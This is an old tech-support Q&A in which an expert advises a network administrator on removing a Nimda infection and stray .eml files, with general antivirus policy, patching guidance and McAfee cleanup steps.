The Nimda virus has infected my network. Norton Antivirus states that it only is placing the file in quarantine...
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
and not cleaning the virus. I also get numerous files with the same name and the suffix .eml on all of my servers. Is there any way I can trace where the virus is coming from? How do I get rid of it completely?
I feel your pain. Here are a few points first before I answer:
Antivirus should be running on all desktops and servers with logging.
Both desktop and server installs should be locked to only your specifications.
These installs should report all viruses to the main console or site.
Company policy should dictate no use of removalable media from outside the copmany without first scanning them.
Viruses should be deleted!!! Yes, delete them as to NOT spread them.
If these procedures were in place, you would know when and if a virus hit your network. The logging/alerts would be sent to you, then you would know where they are arriving into your network.
Okay, now lets see if I can answer you:
Change the Norton configuration to "delete" all viruses and clean. Change every desktop and server in the company, no matter the length of time to accomlish this. I know one company that did all 10,000 desktops and servers in a weekend simply becuase they did not have remote management. It was that important due to loss of hours and data.
Check the patch levels of all Microsoft Devices (OS, ISS, SQL, Exhcange). Microsoft reports that if all your systems are patched, Nimda should die quickly.
Your .eml problem may be an Aliases problem related to the following: Klaz (F-Secure), TROJ_KLEZ.C (Trend), W32.Klez.D@mm (NAV), W32/Klez (Panda), W32/Klez.a@MM, W32/Klez.b@MM, W32/Klez.eml, W32/Klez@MM, Win32.Klez.D@mm (AVX)
Check www.mcafee.com for references to each of these. Here are specific instructions from McAfee:
Removing the .eml threat requires patching vulnerable systems, disabling network shares, and using the latest DAT files. It can not be removed manually.
Infected systems must:
You may need to accomplish furhter work on the .eml issue. It may not or may be Nimda related. Since I do not have first hand access to your systems and have not see the logs or reports, I can only assume facts.
- Apply the patches
- Close any network shares prior to cleaning
- Exit any running applications
- Stop a running IIS server
- Scan and clean each drive
- Restore the RICHED20.DLL and MMC.EXE files if they were overwritten by the virus and deleted by the scanner.